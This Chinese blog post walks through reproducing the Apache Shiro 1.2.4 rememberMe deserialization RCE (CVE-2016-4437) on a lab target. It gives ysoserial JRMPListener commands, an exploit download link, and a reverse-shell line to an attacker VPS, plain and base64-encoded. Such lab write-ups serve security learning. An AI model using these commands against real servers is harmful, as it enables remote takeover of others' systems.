【漏洞复现】ApacheShiro1.2.4反序列化漏洞复现(CVE-2016-4437)

最新推荐文章于 2024-04-15 17:40:45 发布
最新推荐文章于 2024-04-15 17:40:45 发布
阅读量2k 收藏
点赞数
分类专栏: Web安全 文章标签: apacheshiro CVE-2016-4437 反序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cj_allen/article/details/106754041
版权

前言:

Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。

影响版本:

Apache Shiro <= 1.2.4

漏洞原理:

Apache Shiro 1.2.4及以前版本中,Apache Shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值 > Base64解码–>AES解密–>反序列化。然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。

漏洞特征:

shiro反序列化的特征:在返回包的 Set-Cookie 中存在 rememberMe=deleteMe 字段
在这里插入图片描述

漏洞复现:

  1. vps机器,java环境
  2. 版本Apache Shiro <=1.2.4
  3. http请求包cookie中的RememberMe参数
  4. 靶场地址:http://vulfocus.fofa.so/
  5. exp下载地址:https://pan.baidu.com/share/init?surl=yH6phKiN3F5RihRXSPe-Qg(提取码pstc)

第一步:启动靶机后,访问URL通过burp抓包,判断环境存在shiro,查看返回包中Set-Cookie中是否存在rememberMe=deleteMe
在这里插入图片描述

第二步:打开公网vps,执行如下命令:(注意这里监听的端口为1099)

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 "反弹 shell 的命令"

这里的命令需要使用Java Runtime配置bash编码。
在线编码转换地址:http://www.jackson-t.ca/runtime-exec-payloads.html
转换命令如下:(这里是反弹shell的端口为1234)

bash -i >& /dev/tcp/VPS公网ip/1234 0>&1

在这里插入图片描述

第三步:最终在VPS上执行的命令如下:

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDYuMTMuOS4zNC8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}"

在这里插入图片描述
第四步:使用exp.py生成payload,需要python2的环境,命令如下:

python2 exp.py 公网VPS:1099   (注意这里的端口为1099)

红色框标出的为生成的payload
在这里插入图片描述
第五步:在VPS上,使用nc监听1234端口,命令如下:

nc -lvvp 1234

在这里插入图片描述
第六步:通过burp抓取任意的http数据包,在cookie中添加生成的payload
在这里插入图片描述

第七步:通过burp发送数据包,查看VPS中java监听接口,nc监听结果。
在这里插入图片描述
在这里插入图片描述

zhzhzh777
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
CVE-2016-4437 Shiro550 & Shiro721 RememberMe Padding Oracle 漏洞利用
03-29
CVE-2016-4437 Shiro550 & Shiro721 RememberMe Padding Oracle Shiro721 RememberMe Padding Oracle影响版本: - Apache Shiro 1.2.5,1.2.6,1.3.0,1.3.1,1.3.2,1.4.0-RC2,1.4.0,1.4.1 CVE-2016-4437 ...
框架、组件漏洞系列4:Apache shiro漏洞汇总
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
12-14 3641
一、Apache Shiro 简介 1、什么是shiro Apache Shiro提供了认证、授权、加密和会话管理功能,将杂的问题隐藏起来,提供清晰直观的API使开发者可以很轻松地开发自己的程序安全代码。并且在实此目标时无须依赖第三方的框架、容器或服务,当然也能做到与这些环境的整合,使其在任何环境下都可拿来使用。 Shiro将目标集中于Shiro开发团队所称的“四大安全基石”-认证(Authentication)、授权(Authorization)、会话管理(Session Management)和加.
shiro序列漏洞(CVE-2016-4437)漏洞
HEAVEN569的博客
06-21 3849
本文对shiro序列漏洞(CVE-2016-4437),进行了分析,介绍了利用工具和常规修方法
Shiro550漏洞(CVE-2016-4437),2024年最新阿里P7深入Binder原理讲解
最新发布
m0_61943758的博客
04-15 677
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。在代码里(Shiro-550),Shiro 1.2.4 以上版本官方移除了代码中的默认密钥,要求开发者自己设置,如果开发者没有设置,则默认动态生成,降低了固定密钥泄漏的风险。当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份。
Shiro 1.2.4序列漏洞
帅醉了的博客
11-03 542
直接使用工具,成功找到 弹shell 成功
漏洞:CVE-2016-4437 Apache Shiro 序列
m_ing
06-28 1351
前言:从今天开始漏洞啦 我们首先要知道什么是序列漏洞呢? 在这里不做解释,建议大家查看序列漏洞原理 什么是Shiro? shiro默认使用CookieRememberMeManager,对rememberMe的cookie做了加密处理,在CookieRememberMeManaer类中将cookie中rememberMe字段内容先后进行序列、AES加密、Base64编码操作。服务器端识别身份解密处理cookie的流程则是: (1)获取rememberMe cookie (2)base64
Apache Shiro Java序列漏洞-踩坑记录
飞鱼的企鹅的博客
09-29 9636
简介 这个漏洞属于java序列漏洞的一种,shiro是java的一个开发框架,能够快速的搭建好应用程序的环境。 影响版本 Apache Shiro <= 1.2.4 环境搭建 制作war包 首先,需要获取 Apache Shiro 存在漏洞的源代码,具体操作如下: git clone https://github.com/apache/shiro.git cd /shiro git ch...
Apache shiro1.2.4序列漏洞介绍.docx
07-01
Apache shiro1.2.4序列漏洞介绍 Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。Apache Shiro框架提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次...
Shiro序列漏洞检测工具
01-05
Shiro1.2.4及以下版本存在序列漏洞,该工具用于测试该漏洞
Shiro序列漏洞,Shiro版本升级资源
06-22
从上面我们了解到,序列漏洞主要是由于硬编码引起的,那么只要解决硬编码,就解决了该漏洞。解决硬编码主要有两种方式: 方法一:自行实key值 方法二:升级到1.2.5版本或以上 那么在我的项目中,选择的是升级...
druid-1.2.4.rar
12-24
druid-1.2.4.rar
Apache Shiro 1.2.4 序列漏洞(CVE-2016-4437)
qq_51163834的博客
06-05 1889
Apache Shiro框架提供了记住密码的功能,用户登录成功后会将用户信息加密,加密过程:用户信息=>序列=>AES加密=>BASE64编码=>RememberMe Cookie值。如果用户勾选记住密码,那么在请求中会携带cookie,并且将加密信息存放在cookie的rememberMe字段里面,在服务器收到请求对RememberMe值,先进行base64解码然后AES解密在序列,这个加密过程如果我们知道AES加密的密钥,那么我们把用户信息替换成恶意命令,就导致了序列RCE漏洞
Apache Shiro 1.2.4序列漏洞CVE-2016-4437)
忘止于心的博客
07-14 885
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。 Apache Shiro 1.2.4及以前版本中,加密的用户信息序列后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java序列漏洞,进而在目标机器上执行任意命令。 1.搭建好环境 2. http://目标IP:8080 python shiro_exploit.py -u http://ip:80
[Vulfocus解题] shiro 序列CVE-2016-4437)
JY_Heart的博客
01-23 3156
解题过程: 1.打开靶场环境,进入首页
Apache Shiro-721序列漏洞(vulhub)
weixin_52685785的博客
03-27 303
使用Evil Rememberme cookie 认证进行序列攻击:制该cookie,然后重放一下数据,即可成功执行命令,将之前获取的rememberMe更改为刚才爆破出的结果,并放行。python shiro_exp.py http://your-ip:8080/account/ 之前获取的RememberMe值 payload.class)通过抓包(正确的用户名与密码)并放包得到rememberMe的值,将其放入重发器。输入用户名和密码并勾选记住密码。可是因为内存不足无法进入容器。
某信服EDR终端检测响应平台RCE漏洞
cj_Hydra's Blog
08-18 4820
前言: 这个平台是干嘛的,这里就不废话了,刚好赶上了护网期间爆出来的,回头就被告知护网结束,这里简单一下。 : 第一步:通过fofa搜索语法title="终端检测响应平台"可以找到一大批使用该系统的站点。 第二步:随缘点击进去一个来到主界面,也就是这个样子。 第三步:构造payload,这里漏洞文件是c.php,漏洞参数是host /tool/log/c.php?strip_slashes=system&host=id 直接root权限 弹shell。 ...
Zookeeper未授权访问利用
cj_Hydra's Blog
08-05 4410
前言: ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实,是Hadoop和Hbase的重要组件。它是一个为分布式应用提供一致性服务的软件,提供的功能包括:配置维护、域名服务、分布式同步、组服务等。 Zookeeper 的默认开放端口是2181。Zookeeper 安装部署之后默认情况下不需要任何身份验证,造成攻击者可以远程利用 Zookeeper,通过服务器收集敏感信息或者在 Zookeeper 集群内进行破坏(比如:kill命令)。攻击者能够执
Kali安装php7.4+mysql的安装
cj_Hydra's Blog
11-16 2842
前言: php是世界上最好的语言,可是在kali中如何安装呢? 其实在默认的2020版本的kali里面已经集成了php7.3,只需要运行apt-get install php7.3即可对php7.3的安装。 那么如何安装php7.4呢? 添加源: 首先在 etc/apt/下新建一个文件夹 trusted.gpg.d sudo apt -y install lsb-release apt-transport-https ca-certificates sudo wget -O /etc/apt/truste
不安全的HTTP方法(测试)
cj_Hydra's Blog
09-08 2723
前言: 我们常见的HTTP请求方法是GET、POST和HEAD。但是,其实除了这两个之外,HTTP还有一些其他的请求方法。 WebDAV (Web-based Distributed Authoring and Versioning) 一种基于 HTTP 1.1协议的通信协议。它扩展了HTTP 1.1,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法,使应用程序可对Web Server直接读写,并支持写文件锁定(Locking)及解锁(Unlock),还可以支持文件的版本控制。 We
Apache Shiro 1.2.4序列漏洞
07-27
- *1* *2* *3* [Apache Shiro 1.2.4 序列漏洞(CVE-2016-4437 )](https://blog.csdn.net/weixin_60329395/article/details/127399081)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值